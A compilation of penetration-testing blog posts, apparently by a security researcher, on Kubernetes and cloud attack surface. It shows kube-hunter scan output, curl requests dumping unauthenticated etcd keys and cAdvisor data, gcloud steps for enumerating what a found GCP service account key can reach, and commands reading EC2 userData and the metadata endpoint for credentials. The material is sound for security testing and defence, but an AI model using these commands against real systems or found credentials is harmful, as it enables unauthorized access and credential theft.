Open Etcd: http://carnal0wnage.attackresearch.com/2019/01/kubernetes-open-etcd.html
Etcd with kube-hunter: http://carnal0wnage.attackresearch.com/2019/01/kubernetes-kube-hunterpy-etcd.html
cAdvisor: http://carnal0wnage.attackresearch.com/2019/01/kubernetes-cadvisor.html

Kubernetes ports: https://carnal0wnage.attackresearch.com/2019/01/kubernetes-list-of-ports.html
Kubernetes dashboards: http://carnal0wnage.attackresearch.com/2019/01/kubernetes-kubernetes-dashboard.html
Kubelet 10255: https://carnal0wnage.attackresearch.com/2019/01/kubernetes-kube-hunter-10255.html
Kubelet 10250
     – Container Logs: http://carnal0wnage.attackresearch.com/2019/01/kubernetes-kubelet-api-containerlogs.html
     – Getting shellz 1: https://carnal0wnage.attackresearch.com/2019/01/kubernetes-unauth-kublet-api-10250.html
     – Getting shellz 2: https://carnal0wnage.attackresearch.com/2019/01/kubernetes-unauth-kublet-api-10250_16.html

Cloud Metadata URLs and Kubernetes – I’ll update as they get posted.


Kubernetes: kube-hunter.py etcd


I mentioned a few of the auditing tools that exist in the master post. Kube-Hunter is one that is pretty OK. You can use it to quickly scan for multiple Kubernetes issues.


Example run:
$ ./kube-hunter.py
Choose one of the options below:
1. Remote scanning      (scans one or more specific IPs or DNS names)
2. Subnet scanning      (scans subnets on all local network interfaces)
3. IP range scanning    (scans a given IP range)
Your choice: 1
Remotes (separated by a ','): 1.2.3.4
~ Started
~ Discovering Open Kubernetes Services…
|
| Etcd:
|   type: open service
|   service: Etcd
|_  host: 1.2.3.4:2379
|
| Etcd Remote version disclosure:
|   type: vulnerability
|   host: 1.2.3.4:2379
|   description:
|     Remote version disclosure might give an
|_    attacker a valuable data to attack a cluster
|
| Etcd is accessible using insecure connection (HTTP):
|   type: vulnerability
|   host: 1.2.3.4:2379
|   description:
|     Etcd is accessible using HTTP (without
|     authorization and authentication), it would allow a
|     potential attacker to
|     gain access to
|_    the etcd
|
| Etcd Remote Read Access Event:
|   type: vulnerability
|   host: 1.2.3.4:2379
|   description:
|     Remote read access might expose to an
|_    attacker cluster's possible exploits, secrets and more.

———-

Nodes
+-------------+----------------+
| TYPE        | LOCATION       |
+-------------+----------------+
| Node/Master | 1.2.3.4        |
+-------------+----------------+

Detected Services
+---------+--------------+----------------------+
| SERVICE | LOCATION     | DESCRIPTION          |
+---------+--------------+----------------------+
| Etcd    | 1.2.3.4:2379 | Etcd is a DB that    |
|         |              | stores cluster's     |
|         |              | data, it contains    |
|         |              | configuration and    |
|         |              | current state        |
|         |              | information, and     |
|         |              | might contain        |
|         |              | secrets              |
+---------+--------------+----------------------+

Vulnerabilities
+--------------+-----------------+----------------------+---------------------+----------------------+
| LOCATION     | CATEGORY        | VULNERABILITY        | DESCRIPTION         | EVIDENCE             |
+--------------+-----------------+----------------------+---------------------+----------------------+
| 1.2.3.4:2379 | Unauthenticated | Etcd is accessible   | Etcd is accessible  | {"etcdserver":"3.3.9 |
|              | Access          | using insecure       | using HTTP (without | ","etcdcluster":"3.3 |
|              |                 | connection (HTTP)    | authorization and   | ...                  |
|              |                 |                      | authentication), it |                      |
|              |                 |                      | would allow a       |                      |
|              |                 |                      | potential attacker  |                      |
|              |                 |                      | to                  |                      |
|              |                 |                      |     gain access to  |                      |
|              |                 |                      | the etcd            |                      |
+--------------+-----------------+----------------------+---------------------+----------------------+
| 1.2.3.4:2379 | Information     | Etcd Remote version  | Remote version      | {"etcdserver":"3.3.9 |
|              | Disclosure      | disclosure           | disclosure might    | ","etcdcluster":"3.3 |
|              |                 |                      | give an attacker a  | ...                  |
|              |                 |                      | valuable data to    |                      |
|              |                 |                      | attack a cluster    |                      |
+--------------+-----------------+----------------------+---------------------+----------------------+
| 1.2.3.4:2379 | Access Risk     | Etcd Remote Read     | Remote read access  | {"action":"get","nod |
|              |                 | Access Event         | might expose to an  | e":{"dir":true,"node |
|              |                 |                      | attacker cluster's  | ...                  |
|              |                 |                      | possible exploits,  |                      |
|              |                 |                      | secrets and more.   |                      |
+--------------+-----------------+----------------------+---------------------+----------------------+


Kubernetes: open etcd

Quick post on Kubernetes and open etcd (port 2379)

“etcd is a distributed key-value store. In fact, etcd is the primary datastore of Kubernetes; storing and replicating all Kubernetes cluster state. As a critical component of a Kubernetes cluster having a reliable automated approach to its configuration and management is imperative.”

-from: https://coreos.com/blog/introducing-the-etcd-operator.html 

What this means in English is that etcd stores the current state of the Kubernetes cluster, usually including the Kubernetes tokens and passwords. If you check out the following references, you can get a sense of the pain level that could potentially be involved. At minimum you can get network info or running pods, and at best, credentials.

refs: 
https://techbeacon.com/hackers-guide-kubernetes-security 
https://elweb.co/the-security-footgun-in-etcd/
https://raesene.github.io/blog/2017/05/01/Kubernetes-Security-etcd/

The second link talks extensively about the types of info they found when they hit all the Shodan endpoints for 2379 and did some analysis on the results.

If you manage to find open etcd, the easiest way to check for creds is to just do a curl request for:

GET http://ip_address:2379/v2/keys/?recursive=true
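For example (placeholder host; note the /v2/keys API only answers on etcd2, or etcd3 running with the v2 API enabled, so against a v3-only cluster you’d need etcdctl instead):

$ curl -s http://1.2.3.4:2379/version
$ curl -s "http://1.2.3.4:2379/v2/keys/?recursive=true" | jq .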

Example loot: usually it’s boring stuff, but occasionally you’ll get more interesting things, like kubelet tokens (the original post shows screenshots of each).


Kubernetes: cAdvisor

“cAdvisor (Container Advisor) provides container users an understanding of the resource usage and performance characteristics of their running containers. It is a running daemon that collects, aggregates, processes, and exports information about running containers.”

runs on port 4194

Links:
https://kubernetes.io/docs/tasks/debug-application-cluster/resource-usage-monitoring/
https://raesene.github.io/blog/2016/10/14/Kubernetes-Attack-Surface-cAdvisor/

What do you get?

Information disclosure about the metrics of the running containers.

Example request to hit the API and dump data:

http://1.2.3.4:4194/api/v2.0/spec?recursive=true
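On the command line that’s just (placeholder host; jq is only there to pretty-print):

$ curl -s "http://1.2.3.4:4194/api/v2.0/spec?recursive=true" | jq .

cAdvisor also serves a human-friendly web UI at /containers/ on the same port.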



I found a GCP service account token…now what?

Google Cloud Platform (GCP) is rapidly growing in popularity and I haven’t seen too many posts on f**king it up, so I’m going to do at least one 🙂

Google has several ways to do authentication, but what you are most likely to come across, shoved into code somewhere or in a dotfile, is a service account JSON file.

It’s going to look similar to this:
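A redacted skeleton of the standard service account key format (every value here is a made-up placeholder):

{
  "type": "service_account",
  "project_id": "some-project-id",
  "private_key_id": "0123456789abcdef...",
  "private_key": "-----BEGIN PRIVATE KEY-----\n...\n-----END PRIVATE KEY-----\n",
  "client_email": "some-sa@some-project-id.iam.gserviceaccount.com",
  "client_id": "123456789012345678901",
  "auth_uri": "https://accounts.google.com/o/oauth2/auth",
  "token_uri": "https://oauth2.googleapis.com/token",
  "auth_provider_x509_cert_url": "https://www.googleapis.com/oauth2/v1/certs",
  "client_x509_cert_url": "https://www.googleapis.com/robot/v1/metadata/x509/..."
}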

These service account files are similar to AWS tokens in that it can be difficult to determine what they have access to if you don’t already have console and/or IAM access. However, with a little bit of scripting we can brute force at least some of the token’s functionality pretty quickly. The problem is that a service account for something like GCP Compute looks the same as one made to manage your calendar or any of the hundreds of other Google services.

You’ll need to install the gcloud tools for your OS. Info here: https://cloud.google.com/sdk/

Once you have the gcloud suite of tools installed, you can auth with the json file using the following command:

gcloud auth activate-service-account --key-file=KEY_FILE

If the key is invalid, you’ll see something like the below:

gcloud auth activate-service-account --key-file=21.json
ERROR: (gcloud.auth.activate-service-account) There was a problem refreshing your current auth tokens: invalid_grant: Not a valid email or user ID.

Otherwise it will look similar to below:

gcloud auth activate-service-account --key-file=/Users/CG/Documents/pentest/gcp-weirdaal/gcp.json
Activated service account credentials for: [python@removed.iam.gserviceaccount.com]

You can validate it worked by issuing the gcloud auth list command:

gcloud auth list
                  Credentialed Accounts
ACTIVE  ACCOUNT

*       python@removed.iam.gserviceaccount.com

I put together a shell script that runs through a bunch of commands to enumerate information. The only info you need to provide is the project name. This can be found in the json file in the project_id field or by issuing the gcloud projects list command. Sometimes there are multiple projects associated with an account, and you’d need to run the shell script for each project.
The first time you run these API calls you might need to pass a “Y” to the CLI to enable the relevant API. You can get around this manual shenanigans by doing a:
yes | ./gcp_enum.sh
This will answer yes for you each time 🙂
The script is here: https://gist.github.com/carnal0wnage/757d19520fcd9764b24ebd1d89481541
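To give a flavor of what the script automates, the enumeration boils down to a pile of list calls along these lines (all standard gcloud/gsutil subcommands; which ones succeed depends entirely on the token’s roles, and PROJECT_ID is a placeholder):

gcloud compute instances list --project PROJECT_ID
gcloud compute firewall-rules list --project PROJECT_ID
gcloud sql instances list --project PROJECT_ID
gsutil ls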

NCC Group also has two tools you could check out:

https://github.com/nccgroup/G-Scout

and

https://github.com/nccgroup/ScoutSuite

enjoy

CG


AWS EC2 instance userData

In an effort to get me blogging again, I’ll be doing a few short posts to get the juices flowing (hopefully).

Today I learned about the userData instance attribute for AWS EC2.

https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html

In general, I thought metadata was only things you could hit from WITHIN the instance via the metadata URL: http://169.254.169.254/latest/meta-data/

However, if you read the link above, there is an option to add user data at boot time:

“You can also use instance metadata to access user data that you specified when launching your instance. For example, you can specify parameters for configuring your instance, or attach a simple script.”
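From inside the instance, that user data is readable with no credentials at all via the metadata service:

$ curl http://169.254.169.254/latest/user-data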

That’s interesting, right?! So if you have some AWS creds, the easiest way to check for this (after you enumerate instance IDs) is with the aws cli.

$ aws ec2 describe-instance-attribute --attribute userData --instance-id i-0XXXXXXXX

An error occurred (InvalidInstanceID.NotFound) when calling the DescribeInstanceAttribute operation: The instance ID 'i-0XXXXXXXX' does not exist

ah crap, you need the region…

$ aws ec2 describe-instance-attribute --attribute userData --instance-id i-0XXXXXXXX --region us-west-1
{
    "InstanceId": "i-0XXXXXXXX",
    "UserData": {
        "Value": "bm90IHRvZGF5IElTSVMgOi0p"
    }
}
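The Value comes back base64-encoded, so pipe it through a decoder to see what’s actually in there (this one is just a joke string):

$ echo "bm90IHRvZGF5IElTSVMgOi0p" | base64 -d
not today ISIS :-)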

Anyway, that can get tedious, especially if the org has a ton of things running. This is precisely the reason @cktricky and I built weirdAAL. Surely no one would be sticking creds into things at boot time via shell scripts 🙂

The module loops through all the regions and queries the userData attribute for any instances it finds. Hurray for automation.

That module is in the current version of weirdAAL. Enjoy.

-CG
